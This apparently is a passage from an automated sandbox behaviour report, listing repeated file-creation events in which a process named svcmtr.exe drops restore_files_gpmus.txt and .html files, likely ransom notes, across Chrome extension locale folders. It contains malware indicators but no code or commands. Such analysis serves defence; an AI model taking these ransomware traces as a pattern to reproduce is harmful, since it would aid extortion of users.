Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\lv\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\lv\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\ms\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\ms\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\nl\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\nl\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\no\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\no\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\pl\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\pl\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\pt_BR\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\pt_BR\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\pt_PT\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\pt_PT\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\ro\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\ro\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\ru\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\ru\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\sk\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\sk\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\sl\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\sl\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\sr\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\sr\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\sv\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\sv\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\th\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\th\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\tr\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\tr\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\uk\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\uk\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\vi\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\vi\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\zh_CN\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\zh_CN\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\zh_TW\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\zh_TW\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_metadata\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_metadata\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ar\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ar\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\bg\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\bg\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ca\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ca\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\cs\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\cs\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\da\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\da\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\de\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\de\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\el\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\el\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\en\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\en\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\es\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\es\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\fi\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\fi\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\fil\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\fil\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\fr\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\fr\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\he\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\he\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\hi\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\hi\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\hr\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\hr\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\hu\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\hu\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\id\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\id\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\it\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\it\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ja\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ja\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ko\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ko\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\lt\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\lt\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\lv\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\lv\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\nl\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\nl\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\no\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\no\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\pl\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\pl\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\pt_BR\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\pt_BR\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\pt_PT\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\pt_PT\restore_files_gpmus.htmlJump to behavior
